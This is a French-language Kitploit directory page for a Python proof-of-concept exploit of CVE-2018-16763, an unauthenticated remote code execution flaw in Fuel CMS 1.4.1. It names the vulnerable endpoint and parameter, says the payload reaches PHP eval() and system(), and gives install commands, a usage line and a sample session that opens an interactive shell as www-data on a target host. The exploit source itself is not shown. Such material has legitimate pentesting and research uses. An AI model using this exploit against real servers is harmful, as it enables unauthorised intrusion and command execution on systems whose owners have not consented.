Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC — PoC en Python pour une exécution de code à distance non authentifiée dans Fuel CMS 1.4.1 via le paramètre `filter`, fournissant un shell interactif pour l'exécution de commandes. | Kitploit
Outils/GitHubGitHub/estebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubestebanzarate/cve-2018-16763-fuel-cms-1.4.1-remote-code-execution-poc

CVE-2018-16763-Fuel-CMS-1.4.1-Remote-Code-Execution-PoC

PoC en Python pour une exécution de code à distance non authentifiée dans Fuel CMS 1.4.1 via le paramètre `filter`, fournissant un shell interactif pour l'exécution de commandes.

Voir le dépôt
1il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2018-16763 — Fuel CMS 1.4.1 Exécution de code à distance (PoC)

Vulnérabilité RCE non authentifiée dans Fuel CMS 1.4.1. Le paramètre filter dans le point de terminaison /fuel/pages/select/ est transmis sans assainissement à un appel eval() dans le backend PHP, permettant l'exécution de code arbitraire via une charge utile spécialement conçue. Contrairement aux injections aveugles, la sortie est reflétée directement dans la réponse HTTP, donc aucun fichier intermédiaire n'est nécessaire.


Comment ça fonctionne

  1. Envoie une requête GET à /fuel/pages/select/ avec une charge utile filter spécialement conçue qui appelle system() de PHP avec la commande souhaitée.
  2. Analyse la sortie reflétée de la réponse HTTP à l'aide d'une expression régulière.
  3. Renvoie la sortie de la commande directement à l'interpréteur interactif.

Prérequis

  • Python 3
  • Installez les dépendances :
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Utilisation

root@kitploit:~
python3 exploit.py -t http://TARGET

Exemple :

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
Shell> hostname
fuel-cms
Shell> exit

Références

  • CVE-2018-16763
  • EDB-47138

Crédits

  • Découverte et exploit original : Syed Sheeraz Ali
  • Nettoyage et interpréteur interactif : Esteban Zárate
Télécharger l’outil